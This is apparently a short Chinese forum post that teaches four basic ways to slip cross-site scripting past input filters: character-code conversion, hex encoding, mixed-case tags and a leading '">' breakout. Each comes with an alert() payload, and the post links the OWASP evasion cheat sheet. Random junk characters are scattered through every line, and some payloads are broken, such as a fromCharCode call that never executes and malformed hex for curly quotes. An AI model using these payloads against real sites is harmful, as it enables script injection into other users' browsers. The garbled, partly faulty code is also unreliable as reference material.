四种超级基础的绕过方法。
6 Y2 y) u3 m& z9 u) F3 _* F Y! g1.转换为ASCII码
. v7 n& k3 y, D# F例子:原脚本为<script>alert(‘I love F4ck’)</script >
+ b8 U) m# g2 I4 d; E通过转换,变成:" S% }2 k. P; @* i
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>
+ f- M& t* R/ f1 h, D% }! x% J & c& q" O x: c) L
2.转换为HEX(十六进制)
& d$ @! t2 ^0 d7 o" h2 g0 Y+ L" M) c例子:原脚本为<script>alert(‘I love F4ck’)</script>
% M- M' `, @% r8 a通过转换,变成:9 m T5 {0 u; S8 l* k5 |
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
# | M. z- {* K) x( C; E 1 |3 C) F4 ?7 m! ?
3.转换脚本的大小写
8 T0 o; U3 s7 c, O例子:原脚本为<script>alert(‘I love F4ck’)</script>" d& O7 r* `6 g" O4 ?' L3 o6 b
转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>
+ s- M4 a* A& ?8 ^, l+ w9 X
# ~" T: ]) N# O) p% B+ i4.增加闭合标记”>
$ M/ f- y( C4 o+ \例子:原脚本为<script>alert(‘I love F4ck’)</script>$ c, [/ w- v0 ^3 }1 G& v
转换为:”><script>alert(‘I love F4ck’)</script>
' t+ L0 P! f0 i) Y更详细绕过技术请参考此网页
~) H$ R3 c+ L% u# r) @4 Ohttps://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
% M4 I+ \$ U9 E- `. h ; k& q) B. P, A! d% i0 \9 m
转换工具使用的是火狐的 hackbar mozilla addon. |